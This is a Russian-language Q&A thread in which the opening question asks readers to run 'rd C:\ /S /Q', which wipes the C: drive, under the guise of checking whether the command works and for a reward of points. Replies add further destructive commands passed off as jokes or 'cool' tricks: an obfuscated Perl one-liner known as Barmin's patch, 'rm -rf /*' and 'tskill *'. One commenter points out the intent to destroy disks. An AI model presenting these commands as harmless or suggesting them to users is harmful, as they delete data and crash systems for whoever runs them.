У вас работает команда в командной строке? rd C:\ /S /Q. Если работает напишите вашу ОС Дам 10 баллов!

Сергей

Странно, что никто ещё про патч Бармина в исходном его виде не написал. Исправляюсь 🙂
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Натуся Волкова

rm -rf /* у себя сделай дятел. Нашел где умничать. 🙂

Анастасия Тришечкина

пробуйте ахахах

El
Elgo

у меня работает все Windows 7 ultimate 64bit

Максим Мезин

🙂 я тоже 5+ поставлю! только дождитесь процесса ))))

Кирилл

Ага вот сука нашёлся умник тут один! Чтоб все диски убить! Олень рогатый! ))))

Владимир Соколов

Вот ещё попробуйте, тоже круто
tskill *

Знаю ещё пару команд, они полностью положут ОС.